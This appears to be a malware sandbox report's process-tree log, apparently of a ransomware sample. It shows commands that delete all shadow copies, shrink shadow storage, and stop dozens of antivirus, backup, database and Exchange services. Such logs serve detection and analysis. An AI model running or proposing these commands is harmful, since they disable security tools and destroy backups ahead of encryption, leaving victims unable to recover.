C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider"4⤵PID:1716
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"2⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\system32\net.exenet stop " Enterprise Client Service"3⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop " Enterprise Client Service"4⤵PID:316
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service"3⤵PID:1324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service"4⤵PID:1176
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Agent"2⤵
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\system32\net.exenet stop "Sophos Agent"3⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent"4⤵PID:1100
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service"3⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service"4⤵PID:1952
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"2⤵
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\system32\net.exenet stop "Sophos Clean Service"3⤵PID:1932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service"4⤵PID:2036
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"2⤵PID:436
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service"3⤵PID:1796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service"4⤵PID:1504
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"2⤵PID:1844
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service"3⤵PID:968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service"4⤵PID:1948
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"2⤵PID:556
-
C:\Windows\system32\net.exenet stop "Sophos Health Service"3⤵PID:1388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service"4⤵PID:1520
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"2⤵PID:1168
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent"3⤵PID:1164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent"4⤵PID:1508
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"2⤵PID:1412
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client"3⤵PID:1592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client"4⤵PID:1604
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"2⤵PID:860
-
C:\Windows\system32\net.exenet stop "Sophos Message Router"3⤵PID:1560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router"4⤵PID:1688
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"2⤵PID:1728
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service"3⤵PID:976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service"4⤵PID:784
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"2⤵PID:2040
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service"3⤵PID:240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service"4⤵PID:1008
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"2⤵PID:1112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"2⤵PID:1784
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service"3⤵PID:1428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service"4⤵PID:1500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"2⤵PID:1064
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service"3⤵PID:1148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service"4⤵PID:1224
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"2⤵PID:848
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery"3⤵PID:1940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery"4⤵PID:1056
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"2⤵PID:1732
-
C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service"3⤵PID:1708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"4⤵PID:868
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcronisAgent"2⤵PID:1048
-
C:\Windows\system32\net.exenet stop "AcronisAgent"3⤵PID:1956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcronisAgent"4⤵PID:1040
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"2⤵PID:1520
-
C:\Windows\system32\net.exenet stop "AcrSch2Svc"3⤵PID:1388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcrSch2Svc"4⤵PID:556
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Antivirus"2⤵PID:1740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"2⤵PID:1584
-
C:\Windows\system32\net.exenet stop "BackupExecAgentAccelerator"3⤵PID:1240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentAccelerator"4⤵PID:1596
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"2⤵PID:1968
-
C:\Windows\system32\net.exenet stop "BackupExecAgentBrowser"3⤵PID:1564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentBrowser"4⤵PID:1344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"2⤵PID:1696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"2⤵PID:2028
-
C:\Windows\system32\net.exenet stop "BackupExecJobEngine"3⤵PID:1936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecJobEngine"4⤵PID:1608
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"2⤵PID:1144
-
C:\Windows\system32\net.exenet stop "BackupExecManagementService"3⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecManagementService"4⤵PID:1432
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"2⤵PID:1692
-
C:\Windows\system32\net.exenet stop "BackupExecRPCService"3⤵PID:516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecRPCService"4⤵PID:316
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"2⤵PID:964
-
C:\Windows\system32\net.exenet stop "BackupExecVSSProvider"3⤵PID:472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecVSSProvider"4⤵PID:1632
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EPSecurityService"2⤵PID:1160
-
C:\Windows\system32\net.exenet stop "EPSecurityService"3⤵PID:1672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EPSecurityService"4⤵PID:1748
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IISAdmin"2⤵PID:1100
-
C:\Windows\system32\net.exenet stop "IISAdmin"3⤵PID:560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IISAdmin"4⤵PID:1500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"2⤵PID:1428
-
C:\Windows\system32\net.exenet stop "IMAP4Svc"3⤵PID:1784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IMAP4Svc"4⤵PID:364
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "macmnsvc"2⤵PID:1780
-
C:\Windows\system32\net.exenet stop "macmnsvc"3⤵PID:1680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "macmnsvc"4⤵PID:2020
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "masvc"2⤵PID:2036
-
C:\Windows\system32\net.exenet stop "masvc"3⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "masvc"4⤵PID:1056
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBAMService"2⤵PID:1940
-
C:\Windows\system32\net.exenet stop "MBAMService"3⤵PID:848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBAMService"4⤵PID:1792
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"2⤵PID:1668
-
C:\Windows\system32\net.exenet stop "MBEndpointAgent"3⤵PID:436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBEndpointAgent"4⤵PID:1796
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"2⤵PID:1948
-
C:\Windows\system32\net.exenet stop "McAfeeEngineService"3⤵PID:1516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeEngineService"4⤵PID:1844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"2⤵PID:968
-
C:\Windows\system32\net.exenet stop "McAfeeFramework"3⤵PID:580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFramework"4⤵PID:556
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"2⤵PID:1388
-
C:\Windows\system32\net.exenet stop "McAfeeFrameworkMcAfeeFramework"3⤵PID:1520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"4⤵PID:1400
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McShield"2⤵PID:628
-
C:\Windows\system32\net.exenet stop "McShield"3⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield"4⤵PID:1596
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfemms"2⤵PID:1240
-
C:\Windows\system32\net.exenet stop "mfemms"3⤵PID:1584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfemms"4⤵PID:1344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfevtp"2⤵PID:1564
-
C:\Windows\system32\net.exenet stop "mfevtp"3⤵PID:1968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfevtp"4⤵PID:1560
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MMS"2⤵PID:1688
-
C:\Windows\system32\net.exenet stop "MMS"3⤵PID:840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MMS"4⤵PID:1716
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mozyprobackup"2⤵PID:1712
-
C:\Windows\system32\net.exenet stop "mozyprobackup"3⤵PID:860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mozyprobackup"4⤵PID:1728
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer"2⤵PID:976
-
C:\Windows\system32\net.exenet stop "MsDtsServer"3⤵PID:784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer"4⤵PID:240
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"2⤵PID:1008
-
C:\Windows\system32\net.exenet stop "MsDtsServer100"3⤵PID:1536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer100"4⤵PID:1176
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"2⤵PID:980
-
C:\Windows\system32\net.exenet stop "MsDtsServer110"3⤵PID:2040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer110"4⤵PID:640
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeES"2⤵PID:1112
-
C:\Windows\system32\net.exenet stop "MSExchangeES"3⤵PID:1324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeES"4⤵PID:1544
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"2⤵PID:1236
-
C:\Windows\system32\net.exenet stop "MSExchangeIS"3⤵PID:1744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeIS"4⤵PID:1336
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"2⤵PID:1952
-
C:\Windows\system32\net.exenet stop "MSExchangeMGMT"3⤵PID:2012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMGMT"4⤵PID:1064
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"2⤵PID:1148
-
C:\Windows\system32\net.exenet stop "MSExchangeMTA"3⤵PID:1224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMTA"4⤵PID:1264
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"2⤵PID:1676
-
C:\Windows\system32\net.exenet stop "MSExchangeSA"3⤵PID:1932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSA"4⤵PID:1972
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"2⤵PID:1504
-
C:\Windows\system32\net.exenet stop "MSExchangeSRS"3⤵PID:1944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"2⤵PID:1708
-
C:\Windows\system32\net.exenet stop "MSOLAP$SQL_2008"3⤵PID:868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SQL_2008"4⤵PID:1956
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"2⤵PID:1040
-
C:\Windows\system32\net.exenet stop "MSOLAP$SYSTEM_BGC"3⤵PID:1804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"4⤵PID:1416
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"2⤵PID:700
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPS"3⤵PID:1048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPS"4⤵PID:1508
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"2⤵PID:1520
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPSAMA"3⤵PID:1388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPSAMA"4⤵PID:1596
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"2⤵PID:1740
-
C:\Windows\system32\net.exenet stop "MSSQL$BKUPEXEC"3⤵PID:628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"4⤵PID:1344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"2⤵PID:1584
-
C:\Windows\system32\net.exenet stop "MSSQL$ECWDB2"3⤵PID:1240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$ECWDB2"4⤵PID:1560
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"2⤵PID:1968
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTICEMGT"3⤵PID:1564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"4⤵PID:1716
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"2⤵PID:840
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTTICEBGC"3⤵PID:1688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"4⤵PID:1728
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"2⤵PID:860
-
C:\Windows\system32\net.exenet stop "MSSQL$PROFXENGAGEMENT"3⤵PID:1712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"4⤵PID:240
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"2⤵PID:784
-
C:\Windows\system32\net.exenet stop "MSSQL$SBSMONITORING"3⤵PID:976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"4⤵PID:1176
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"2⤵PID:1536
-
C:\Windows\system32\net.exenet stop "MSSQL$SHAREPOINT"3⤵PID:1008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"4⤵PID:640
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"2⤵PID:2040
-
C:\Windows\system32\net.exenet stop "MSSQL$SQL_2008"3⤵PID:980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQL_2008"4⤵PID:1544
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"2⤵PID:1324
-
C:\Windows\system32\net.exenet stop "MSSQL$SYSTEM_BGC"3⤵PID:1112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"4⤵PID:1336
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"2⤵PID:1744
-
C:\Windows\system32\net.exenet stop "MSSQL$TPS"3⤵PID:1236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPS"4⤵PID:1064
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"2⤵PID:2012
-
C:\Windows\system32\net.exenet stop "MSSQL$TPSAMA"3⤵PID:1952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPSAMA"4⤵PID:1264
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"2⤵PID:1224
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"3⤵PID:1148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"4⤵PID:1972
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"2⤵PID:1932
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2012"3⤵PID:1676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"4⤵PID:1732
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"2⤵PID:1944
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher"3⤵PID:1504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher"4⤵PID:1956
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"2⤵PID:868
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$PROFXENGAGEMENT"3⤵PID:1708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"4⤵PID:1416
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"2⤵PID:1804
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SBSMONITORING"3⤵PID:1040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"4⤵PID:1508
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"2⤵PID:1048
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SHAREPOINT"3⤵PID:700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"4⤵PID:1596
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"2⤵PID:1648
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SQL_2008"3⤵PID:1412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"4⤵PID:1592
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCatalogSvc"3⤵PID:1432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"2⤵PID:1320
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SYSTEM_BGC"3⤵PID:1492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"4⤵PID:984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"2⤵PID:1168
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPS"3⤵PID:1696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"4⤵PID:1608
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"2⤵PID:1604
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPSAMA"3⤵PID:2028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"4⤵PID:1432
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"2⤵PID:636
-
C:\Windows\system32\net.exenet stop "MSSQLSERVER"3⤵PID:1144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLSERVER"4⤵PID:316
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"2⤵PID:1936
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper100"3⤵PID:1692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper100"4⤵PID:1632
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"2⤵PID:960
-
C:\Windows\system32\net.exenet stop "MSSQLServerOLAPService"3⤵PID:964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerOLAPService"4⤵PID:1748
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL80"2⤵PID:516
-
C:\Windows\system32\net.exenet stop "MySQL80"3⤵PID:1160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL80"4⤵PID:1500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL57"2⤵PID:472
-
C:\Windows\system32\net.exenet stop "MySQL57"3⤵PID:1100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL57"4⤵PID:364
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"2⤵PID:1672
-
C:\Windows\system32\net.exenet stop "OracleClientCache80"3⤵PID:1428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "OracleClientCache80"4⤵PID:2020
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "PDVFSService"2⤵PID:560
-
C:\Windows\system32\net.exenet stop "PDVFSService"3⤵PID:1780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PDVFSService"4⤵PID:1056
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "POP3Svc"2⤵PID:1784
-
C:\Windows\system32\net.exenet stop "POP3Svc"3⤵PID:2036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "POP3Svc"4⤵PID:1792
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer"2⤵PID:1680
-
C:\Windows\system32\net.exenet stop "ReportServer"3⤵PID:1940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer"4⤵PID:1796
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"2⤵PID:1060
-
C:\Windows\system32\net.exenet stop "ReportServer$SQL_2008"3⤵PID:1668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SQL_2008"4⤵PID:1844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"2⤵PID:848
-
C:\Windows\system32\net.exenet stop "ReportServer$SYSTEM_BGC"3⤵PID:1948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"4⤵PID:556
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"2⤵PID:436
-
C:\Windows\system32\net.exenet stop "ReportServer$TPS"3⤵PID:968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPS"4⤵PID:1400
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"2⤵PID:1516
-
C:\Windows\system32\net.exenet stop "ReportServer$TPSAMA"3⤵PID:1436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPSAMA"4⤵PID:1600
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "RESvc"2⤵PID:580
-
C:\Windows\system32\net.exenet stop "RESvc"3⤵PID:628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "RESvc"4⤵PID:1344
-
